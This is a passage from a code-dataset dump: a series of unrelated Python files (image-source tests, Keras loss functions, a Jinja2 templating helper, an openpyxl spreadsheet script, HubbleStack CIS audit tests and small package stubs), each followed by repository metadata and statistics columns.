img = cv2.imread(filename)
assert img is not None, 'Can''t load ' + filename
hashes_rgb[i] = hashlib.md5(cv2.cvtColor(img, cv2.COLOR_BGR2RGB)).hexdigest()
images = imagesource.FilesSource(files_template)
frame_lookup_table = [0, 2, 4, 6, 8]
errors = [10, 20, 30, 40, 50]
images_synchronized = imagesource.SynchronizedSource(images, frame_lookup_table, errors)
img = images_synchronized.get_image(0)
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[0])
eq_(images_synchronized.get_synchronization_error(0), 10)
img = images_synchronized.get_image(1)
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[2])
eq_(images_synchronized.get_synchronization_error(1), 20)
img = images_synchronized.get_image(4)
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[8])
eq_(images_synchronized.get_synchronization_error(4), 50)
| 34.357576
| 92
| 0.665197
| 759
| 5,669
| 4.760211
| 0.158103
| 0.071962
| 0.082757
| 0.14005
| 0.795738
| 0.755328
| 0.719624
| 0.719624
| 0.691392
| 0.691392
| 0
| 0.028515
| 0.201976
| 5,669
| 164
| 93
| 34.567073
| 0.770115
| 0.219968
| 0
| 0.712963
| 0
| 0
| 0.019402
| 0.011185
| 0
| 0
| 0
| 0
| 0.037037
| 1
| 0.037037
| false
| 0
| 0.064815
| 0
| 0.101852
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
4b3e2bcdadf005030db9e03c18bd98719a12d2f9
| 564
|
py
|
Python
|
survol/scripts/pydbg/utils/__init__.py
|
AugustinMascarelli/survol
|
7a822900e82d1e6f016dba014af5741558b78f15
|
[
"BSD-3-Clause"
] | 9
|
2017-10-05T23:36:23.000Z
|
2021-08-09T15:40:03.000Z
|
survol/scripts/pydbg/utils/__init__.py
|
AugustinMascarelli/survol
|
7a822900e82d1e6f016dba014af5741558b78f15
|
[
"BSD-3-Clause"
] | 21
|
2018-01-02T09:33:03.000Z
|
2018-08-27T11:09:52.000Z
|
survol/scripts/pydbg/utils/__init__.py
|
AugustinMascarelli/survol
|
7a822900e82d1e6f016dba014af5741558b78f15
|
[
"BSD-3-Clause"
] | 4
|
2018-06-23T09:05:45.000Z
|
2021-01-22T15:36:50.000Z
|
#
# $Id: __init__.py 211 2007-08-16 20:18:47Z pedram $
#
__all__ = \
[
"code_coverage",
"crash_binning",
"hooking",
"injection",
"udraw_connector",
]
import sys
if sys.version_info >= (3,):
from .code_coverage import *
from .crash_binning import *
from .hooking import *
from .injection import *
from .udraw_connector import *
else:
from code_coverage import *
from crash_binning import *
from hooking import *
from injection import *
from udraw_connector import *
| 20.142857
| 52
| 0.611702
| 64
| 564
| 5.109375
| 0.4375
| 0.244648
| 0.183486
| 0.134557
| 0.636086
| 0.636086
| 0.636086
| 0.636086
| 0.636086
| 0.636086
| 0
| 0.045226
| 0.294326
| 564
| 27
| 53
| 20.888889
| 0.776382
| 0.088652
| 0
| 0
| 0
| 0
| 0.111765
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.52381
| 0
| 0.52381
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
4b8dccae20d3918c17b046b641d2a30cc83709ab
| 111
|
py
|
Python
|
skiski/helper.py
|
esehara/skiski
|
9c76ebb9a0cda97382b85180157b0bd5e2f62f71
|
[
"MIT"
] | null | null | null |
skiski/helper.py
|
esehara/skiski
|
9c76ebb9a0cda97382b85180157b0bd5e2f62f71
|
[
"MIT"
] | 1
|
2016-05-20T04:30:25.000Z
|
2016-05-20T20:41:28.000Z
|
skiski/helper.py
|
esehara/skiski
|
9c76ebb9a0cda97382b85180157b0bd5e2f62f71
|
[
"MIT"
] | null | null | null |
def Typename(name):
class TypeN(type):
def __repr__(cls):
return name
return TypeN
| 18.5
| 26
| 0.576577
| 13
| 111
| 4.615385
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.342342
| 111
| 5
| 27
| 22.2
| 0.821918
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
4bab11cb7e924a79094e539914486418616b1947
| 128
|
py
|
Python
|
pipenv/patched/piptools/click.py
|
Enzime/pipenv
|
d4f710be4a39e09a82a5133b7b3a277ee9bfb13a
|
[
"MIT"
] | 4
|
2018-10-01T08:56:14.000Z
|
2020-01-04T19:47:45.000Z
|
pipenv/patched/piptools/click.py
|
Enzime/pipenv
|
d4f710be4a39e09a82a5133b7b3a277ee9bfb13a
|
[
"MIT"
] | 23
|
2020-06-12T08:20:51.000Z
|
2021-06-25T15:38:50.000Z
|
pipenv/patched/piptools/click.py
|
Enzime/pipenv
|
d4f710be4a39e09a82a5133b7b3a277ee9bfb13a
|
[
"MIT"
] | 2
|
2021-11-11T00:36:27.000Z
|
2022-02-09T09:47:35.000Z
|
from __future__ import absolute_import
import click
click.disable_unicode_literals_warning = True
from click import * # noqa
| 18.285714
| 45
| 0.828125
| 17
| 128
| 5.764706
| 0.647059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140625
| 128
| 6
| 46
| 21.333333
| 0.890909
| 0.03125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
298a990acd51aa804f43df5d0fe6aba8751a0203
| 174
|
py
|
Python
|
presalytics/client/presalytics_ooxml_automation/api/__init__.py
|
presalytics/python-client
|
5d80b78562126feeeb49af4738e2c1aed12dce3a
|
[
"MIT"
] | 4
|
2020-02-21T16:30:46.000Z
|
2021-01-12T12:22:03.000Z
|
presalytics/client/presalytics_ooxml_automation/api/__init__.py
|
presalytics/python-client
|
5d80b78562126feeeb49af4738e2c1aed12dce3a
|
[
"MIT"
] | 4
|
2019-12-28T19:30:08.000Z
|
2020-03-31T19:27:45.000Z
|
presalytics/client/presalytics_ooxml_automation/api/__init__.py
|
presalytics/python-client
|
5d80b78562126feeeb49af4738e2c1aed12dce3a
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
# flake8: noqa
# import apis into api package
from presalytics.client.presalytics_ooxml_automation.api.default_api import DefaultApi
| 24.857143
| 86
| 0.850575
| 23
| 174
| 6.086957
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006452
| 0.109195
| 174
| 6
| 87
| 29
| 0.896774
| 0.235632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
298c110226abdd75deadb65ea8c975dbce7c624b
| 296
|
py
|
Python
|
app/python/scalrpy/exceptions.py
|
unitasglobal/scalr
|
d1b440a46a72c4d30be4db022ba8c0e9ef5c5e73
|
[
"Apache-2.0"
] | 3
|
2017-08-22T17:39:06.000Z
|
2017-12-07T03:49:42.000Z
|
app/python/scalrpy/exceptions.py
|
unitasglobal/scalr
|
d1b440a46a72c4d30be4db022ba8c0e9ef5c5e73
|
[
"Apache-2.0"
] | 1
|
2021-06-01T21:52:44.000Z
|
2021-06-01T21:52:44.000Z
|
app/python/scalrpy/exceptions.py
|
unitasglobal/scalr
|
d1b440a46a72c4d30be4db022ba8c0e9ef5c5e73
|
[
"Apache-2.0"
] | 7
|
2016-09-19T20:36:36.000Z
|
2018-12-04T16:53:41.000Z
|
class IterationTimeoutError(Exception):
pass
class AlreadyRunningError(Exception):
pass
class TimeoutError(Exception):
pass
class MissingCredentialsError(Exception):
pass
class IncompleteCredentialsError(Exception):
pass
class FileNotFoundError(Exception):
pass
| 12.869565
| 44
| 0.763514
| 24
| 296
| 9.416667
| 0.375
| 0.345133
| 0.39823
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175676
| 296
| 22
| 45
| 13.454545
| 0.92623
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
2999a883f713f1345e70adbaeaf1a480cf7e2ab9
| 19
|
py
|
Python
|
EpyModels/__init__.py
|
jamescodella/EpyModels
|
a6f1e637ed6aec761b7050ca9b686c2b3dba4daa
|
[
"MIT"
] | 1
|
2020-03-22T00:44:44.000Z
|
2020-03-22T00:44:44.000Z
|
EpyModels/models/__init__.py
|
jamescodella/EpyModels
|
a6f1e637ed6aec761b7050ca9b686c2b3dba4daa
|
[
"MIT"
] | null | null | null |
EpyModels/models/__init__.py
|
jamescodella/EpyModels
|
a6f1e637ed6aec761b7050ca9b686c2b3dba4daa
|
[
"MIT"
] | null | null | null |
# For python module
| 19
| 19
| 0.789474
| 3
| 19
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 19
| 1
| 19
| 19
| 0.9375
| 0.894737
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
29b88fbfd7a5ee3e0e22160733d4e91c2814ea97
| 54
|
py
|
Python
|
feature_encoders/compose/__init__.py
|
hebes-io/feature-encoding
|
741b486a82b346c0354403b6707e105f74012d68
|
[
"Apache-2.0"
] | null | null | null |
feature_encoders/compose/__init__.py
|
hebes-io/feature-encoding
|
741b486a82b346c0354403b6707e105f74012d68
|
[
"Apache-2.0"
] | null | null | null |
feature_encoders/compose/__init__.py
|
hebes-io/feature-encoding
|
741b486a82b346c0354403b6707e105f74012d68
|
[
"Apache-2.0"
] | null | null | null |
from ._compose import FeatureComposer, ModelStructure
| 27
| 53
| 0.87037
| 5
| 54
| 9.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092593
| 54
| 1
| 54
| 54
| 0.938776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
29db1c7e37bc0b1331677ae9483fd531eef8a1bc
| 47
|
py
|
Python
|
Lib/site-packages/micawber/contrib/mcdjango/templatetags/micawber_tags.py
|
Viktor-Teodor/Dreamaftersix
|
69334ed87477c7c340fda5ecb5fe168b51b6c11a
|
[
"MIT"
] | 411
|
2015-01-01T23:39:05.000Z
|
2022-03-21T21:42:57.000Z
|
Lib/site-packages/micawber/contrib/mcdjango/templatetags/micawber_tags.py
|
Viktor-Teodor/Dreamaftersix
|
69334ed87477c7c340fda5ecb5fe168b51b6c11a
|
[
"MIT"
] | 58
|
2015-01-01T12:20:18.000Z
|
2021-07-12T14:05:51.000Z
|
Lib/site-packages/micawber/contrib/mcdjango/templatetags/micawber_tags.py
|
Viktor-Teodor/Dreamaftersix
|
69334ed87477c7c340fda5ecb5fe168b51b6c11a
|
[
"MIT"
] | 70
|
2015-03-19T08:30:12.000Z
|
2022-02-26T22:58:52.000Z
|
from micawber.contrib.mcdjango import register
| 23.5
| 46
| 0.87234
| 6
| 47
| 6.833333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 47
| 1
| 47
| 47
| 0.953488
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
29ee8813b240e229865e9a6760ae54b0084d2799
| 1,248
|
py
|
Python
|
tnseg/loss.py
|
suryatejadev/thyroid_segmentation
|
09c291a16f33490757f195057a64acd1ea17bd83
|
[
"MIT"
] | 22
|
2018-12-04T05:46:57.000Z
|
2022-02-09T11:44:28.000Z
|
tnseg/loss.py
|
suryatejadev/thyroid_segmentation
|
09c291a16f33490757f195057a64acd1ea17bd83
|
[
"MIT"
] | 4
|
2019-10-05T01:14:04.000Z
|
2021-11-16T16:19:11.000Z
|
tnseg/loss.py
|
suryatejadev/thyroid_segmentation
|
09c291a16f33490757f195057a64acd1ea17bd83
|
[
"MIT"
] | 9
|
2018-11-01T05:56:04.000Z
|
2021-08-12T14:32:21.000Z
|
from __future__ import division
from keras import backend as K
import numpy as np
import tensorflow as tf
from keras.losses import binary_crossentropy
def dice_coef(y_true, y_pred):
smooth = 1.
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)
def dice_coef_numpy(y_true, y_pred):
smooth = 1.
y_true_f = np.ndarray.flatten(y_true)
y_pred_f = np.ndarray.flatten(y_pred)
intersection = np.sum(y_true_f * y_pred_f)
return (2. * intersection + smooth) / (np.sum(y_true_f) + np.sum(y_pred_f) + smooth)
def bin_crossentropy_loss(y_true, y_pred):
return binary_crossentropy(y_true, y_pred)
def iou_score(y_true, y_pred):
smooth = 1.
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
return (1. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)
def dice_coef_loss(y_true, y_pred):
return -dice_coef(y_true, y_pred)
def dice_coef_log_loss(y_true, y_pred):
return -K.log(dice_coef(y_true, y_pred))
def iou_score_loss(y_true, y_pred):
return -iou_score(y_true, y_pred)
| 30.439024
| 88
| 0.711538
| 231
| 1,248
| 3.471861
| 0.151515
| 0.143392
| 0.104738
| 0.174564
| 0.753117
| 0.704489
| 0.527431
| 0.438903
| 0.438903
| 0.410224
| 0
| 0.005825
| 0.174679
| 1,248
| 40
| 89
| 31.2
| 0.772816
| 0
| 0
| 0.290323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.225806
| false
| 0
| 0.16129
| 0.129032
| 0.612903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
4b17400b8c4044ba2cd2e8eac382381c95a506d9
| 4,603
|
py
|
Python
|
objectify/template.py
|
mzpqnxow/mzpqnxow.objectify
|
97cdda6157719ec38d7834a43815abb6c4049a57
|
[
"BSD-3-Clause"
] | null | null | null |
objectify/template.py
|
mzpqnxow/mzpqnxow.objectify
|
97cdda6157719ec38d7834a43815abb6c4049a57
|
[
"BSD-3-Clause"
] | null | null | null |
objectify/template.py
|
mzpqnxow/mzpqnxow.objectify
|
97cdda6157719ec38d7834a43815abb6c4049a57
|
[
"BSD-3-Clause"
] | null | null | null |
"""Provide templating functionality for use in YaML loading"""
from os.path import expanduser
from jinja2 import Template
from objectify.log import error_frame
def _recursive_template(data, template_vars=None, user_path_expand=True):
"""data is an arbitrary data structure, template_vars is a dict
The `data` object is traversed and each instance of a Jinja2 variable
that is found in template_vars is replaced (templated)
This is a recursive function with the end-case being when the object is
a simple string or unicode string type
"""
def _handle_list(data, template_vars):
"""Handle the case where data is a list"""
tmp_list = []
data.reverse()
while data:
item = data.pop()
item = recursive_template(item, template_vars)
tmp_list.append(item)
return tmp_list
def _handle_str(data, template_vars):
"""Handle a simple string value"""
tmpl = Template(data)
data = tmpl.render(template_vars)
if user_path_expand is True:
data = expanduser(data)
return data
def _handle_numeric(data, template_vars):
"""Handle a simple integer type"""
return data
def _handle_dict(data, template_vars):
"""Handle a dict value by going deeper/recursing"""
if isinstance(data, dict):
for key, value in data.items():
data[key] = recursive_template(value, template_vars)
return data
if template_vars is None:
template_vars = {}
elif not isinstance(template_vars, dict):
raise RuntimeError('template_vars must be an instance of dict()')
type_handlers = {
'str': _handle_str,
'dict': _handle_dict,
'OrderedDict': _handle_dict,
'list': _handle_list,
'int': _handle_numeric,
'float': _handle_numeric
}
handler_key = type(data).__name__
handler = type_handlers[handler_key]
return handler(data, template_vars)
error_frame('unexpected and unsupported type "{}" encountered'.format(
type(data)))
raise RuntimeError('unable to template object')
def recursive_template(data, template_vars=None, user_path_expand=True):
"""data is an arbitrary data structure, template_vars is a dict
The `data` object is traversed and each instance of a Jinja2 variable
that is found in template_vars is replaced (templated)
This is a recursive function with the end-case being when the object is
a simple string or unicode string type
"""
# These conditionals can be cleaned up a little bit
# Note there is no use for `elif` because each block returns making
# the `else` implied
# def _handle_list(data, template_vars):
# tmp_list = []
# data.reverse()
# while data:
# item = data.pop()
# item = recursive_template(item, template_vars)
# tmp_list.append(item)
# return tmp_list
# def _handle_str(data, template_vars, user_path_expand=user_path_expand):
# tmpl = Template(data)
# data = tmpl.render(template_vars)
# if user_path_expand is True:
# data = expanduser(data)
# return data
# def _handle_numeric(data):
# return data
# def _handle_dict(data, template_vars):
# if isinstance(data, dict):
# for key, value in data.items():
# data[key] = recursive_template(value, template_vars)
# return data
if template_vars is None:
template_vars = {}
elif not isinstance(template_vars, dict):
raise RuntimeError('template_vars must be an instance of dict()')
if isinstance(data, str):
tmpl = Template(data)
data = tmpl.render(template_vars)
if user_path_expand is True:
data = expanduser(data)
return data
if isinstance(data, dict):
for key, value in data.items():
data[key] = recursive_template(value, template_vars)
return data
if isinstance(data, list):
# Not supporting sets and tuples since YaML doesn't support them
tmp_list = []
data.reverse()
while data:
item = data.pop()
item = recursive_template(item, template_vars)
tmp_list.append(item)
return tmp_list
if isinstance(data, (int, float)):
return data
error_frame('unexpected and unsupported type "{}" encountered'.format(
type(data)))
raise RuntimeError('unable to template object')
| 32.188811
| 78
| 0.638497
| 576
| 4,603
| 4.925347
| 0.213542
| 0.131124
| 0.056398
| 0.031019
| 0.773
| 0.765597
| 0.731759
| 0.731759
| 0.704265
| 0.704265
| 0
| 0.000904
| 0.279166
| 4,603
| 142
| 79
| 32.415493
| 0.854129
| 0.363459
| 0
| 0.676056
| 0
| 0
| 0.092645
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084507
| false
| 0
| 0.042254
| 0
| 0.253521
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
d99b25f6b5e57c4d144daee9fd24df594365ceca
| 4,393
|
py
|
Python
|
aalh_iit_miltonzinkcollection/populate-format-extent-columns.py
|
johndewees/iitmigration
|
4dadfbecda719d6e7d60af076a231aedec3c862f
|
[
"Unlicense"
] | null | null | null |
aalh_iit_miltonzinkcollection/populate-format-extent-columns.py
|
johndewees/iitmigration
|
4dadfbecda719d6e7d60af076a231aedec3c862f
|
[
"Unlicense"
] | null | null | null |
aalh_iit_miltonzinkcollection/populate-format-extent-columns.py
|
johndewees/iitmigration
|
4dadfbecda719d6e7d60af076a231aedec3c862f
|
[
"Unlicense"
] | null | null | null |
# Populate the format (col 33) and extent (col 34) columns of the
# 'Metadata Template' sheet from the free-text source column (col 47).
from openpyxl import load_workbook

filename = 'aalh_iit_miltonzinkcollection.xlsx'
wb = load_workbook(filename)
ws = wb['Metadata Template']

# Sheet layout: data lives in rows 7-790; column 47 holds the free-text
# description, column 33 receives the derived format label, column 34 the
# extracted extent.
minimumrow = 7
maximumrow = 790
targetcol = 47
formatcol = 33
extentcol = 34

# Substring -> format label, tested in order; the first match wins.
# The order mirrors the original elif chain, so e.g. 'Negative' is
# preferred over 'Black', and capitalized variants are tried first.
FORMAT_KEYWORDS = [
    ('Negative', 'Picture; Negatives'),
    ('negative', 'Picture; Negatives'),
    ('Slide', 'Picture; Slides'),
    ('slide', 'Picture; Slides'),
    ('Post', 'Picture; Postcard'),
    ('post', 'Picture; Postcard'),
    ('Draw', 'Picture; Drawings'),
    ('draw', 'Picture; Drawings'),
    ('Black', 'Picture; Black and white photograph'),
    ('black', 'Picture; Black and white photograph'),
    ('b&w', 'Picture; Black and white photograph'),
    ('B&W', 'Picture; Black and white photograph'),
    ('Color', 'Picture; Color photograph'),
    ('color', 'Picture; Color photograph'),
]

for rownum in range(minimumrow, maximumrow + 1):
    print(rownum)
    sourceval = ws.cell(row=rownum, column=targetcol).value
    print(sourceval)

    # --- format column ---
    if sourceval is None:
        print('FIELD = NONE')
    else:
        label = 'Picture'  # fallback when no keyword matches
        for keyword, candidate in FORMAT_KEYWORDS:
            if keyword in sourceval:
                label = candidate
                break
        ws.cell(row=rownum, column=formatcol).value = label
        print(label)

    # --- extent column ---
    if sourceval is None:
        # Printed a second time deliberately: the original script reported
        # an empty source cell once per pass (format pass and extent pass).
        print('FIELD = NONE')
    else:
        # The extent is embedded as an 'Extent: ...' segment in a
        # semicolon-separated list.
        for item in sourceval.split(';'):
            if 'Ex' in item:
                extent = item.replace('Extent: ', '').strip()
                ws.cell(row=rownum, column=extentcol).value = extent
                print(extent)
            else:
                print('EXTENT = CONFUSING')

wb.save('aalh_iit_miltonzinkcollection.xlsx')
| 51.682353
| 105
| 0.620077
| 480
| 4,393
| 5.652083
| 0.158333
| 0.072982
| 0.109473
| 0.255437
| 0.759676
| 0.73498
| 0.73498
| 0.704755
| 0.670107
| 0.670107
| 0
| 0.012195
| 0.253358
| 4,393
| 85
| 106
| 51.682353
| 0.814939
| 0
| 0
| 0.432099
| 0
| 0
| 0.124594
| 0.015777
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012346
| 0
| 0.012346
| 0.259259
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
d99cea38daebed49418d98310f55405bd38bad63
| 6,599
|
py
|
Python
|
tests/unittests/test_pkg_nova.py
|
praksinha/hubble
|
54062cf07bf2462ea9be149d740f38defd849b25
|
[
"Apache-2.0"
] | 2
|
2019-11-30T19:36:25.000Z
|
2020-09-23T06:28:26.000Z
|
tests/unittests/test_pkg_nova.py
|
praksinha/hubble
|
54062cf07bf2462ea9be149d740f38defd849b25
|
[
"Apache-2.0"
] | 3
|
2020-08-03T18:14:02.000Z
|
2020-08-03T22:43:44.000Z
|
tests/unittests/test_pkg_nova.py
|
praksinha/hubble
|
54062cf07bf2462ea9be149d740f38defd849b25
|
[
"Apache-2.0"
] | null | null | null |
import os
import hubblestack.files.hubblestack_nova.pkg
class TestPkg():
    """Unit tests for the hubblestack_nova ``pkg`` audit module."""

    def test_virtual(self):
        """__virtual__() should always report the module as loadable."""
        expected_val = True
        val = hubblestack.files.hubblestack_nova.pkg.__virtual__()
        assert expected_val == val

    def test_merge_yaml(self):
        """_merge_yaml() folds a profile's data into ``ret``, turning each
        blacklist/whitelist mapping into a list of single-key dicts and
        stamping every check with its 'nova_profile'."""
        ret = {'pkg': {}}
        data = {'pkg':
                {'blacklist': {'talk': {'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}},
                 'whitelist': {'ssh_ignore_rhosts': {'data': {'Ubuntu-16.04': [{'/etc/ssh/sshd_config': {'pattern': 'IgnoreRhosts', 'tag': 'CIS-9.3.6', 'match_output': 'yes'}}]}, 'description': 'Set SSH IgnoreRhosts to Yes'}}}}
        profile = 'ubuntu-1604-level-1-scored-v1-0-0'
        val = hubblestack.files.hubblestack_nova.pkg._merge_yaml(ret, data, profile)
        assert val['pkg'] == {'blacklist': [{'talk': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}}],
                              'whitelist': [{'ssh_ignore_rhosts': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'/etc/ssh/sshd_config': {'pattern': 'IgnoreRhosts', 'tag': 'CIS-9.3.6', 'match_output': 'yes'}}]}, 'description': 'Set SSH IgnoreRhosts to Yes'}}]}

    def test_merge_yaml_recurssive(self):
        """Merging two data sets into the same ``ret`` accumulates blacklist
        entries (talk1 + talk2 -> 2)."""
        ret = {}
        profile = 'ubuntu-1604-level-1-scored-v1-0-0'
        data1 = {'pkg':
                 {'blacklist': {'talk1': {'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}},
                  'whitelist': {'ssh_ignore_rhosts': {'data': {'Ubuntu-16.04': [{'/etc/ssh/sshd_config': {'pattern': 'IgnoreRhosts', 'tag': 'CIS-9.3.6', 'match_output': 'yes'}}]}, 'description': 'Set SSH IgnoreRhosts to Yes'}}}}
        data2 = {'pkg':
                 {'blacklist': {'talk2': {'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}}}}
        data_list = [data1, data2]
        for data in data_list:
            val = hubblestack.files.hubblestack_nova.pkg._merge_yaml(ret, data, profile)
        assert (len(val['pkg']['blacklist'])) == 2

    def test_audit_for_success(self):
        """audit() filtered to tag CIS-6.5 yields successes and no failures
        when pkg.version is stubbed out."""
        val = {}
        data_list = [('ubuntu-1604-level-1-scored-v1-0-0',
                      {'pkg':
                       {'blacklist': {'prelink': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'prelink': 'CIS-4.4'}]}, 'description': 'Disable Prelink'}, 'nis': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'nis': 'CIS-5.1.1'}]}, 'description': 'Ensure NIS is not installed'}},
                        'whitelist': {'ntp': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'ntp': 'CIS-6.5'}]}, 'description': 'Configure Network Time Protocol (NTP)'}, 'rsyslog': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'rsyslog': 'CIS-8.2.1'}]}, 'description': 'Install the rsyslog package'}}}})]
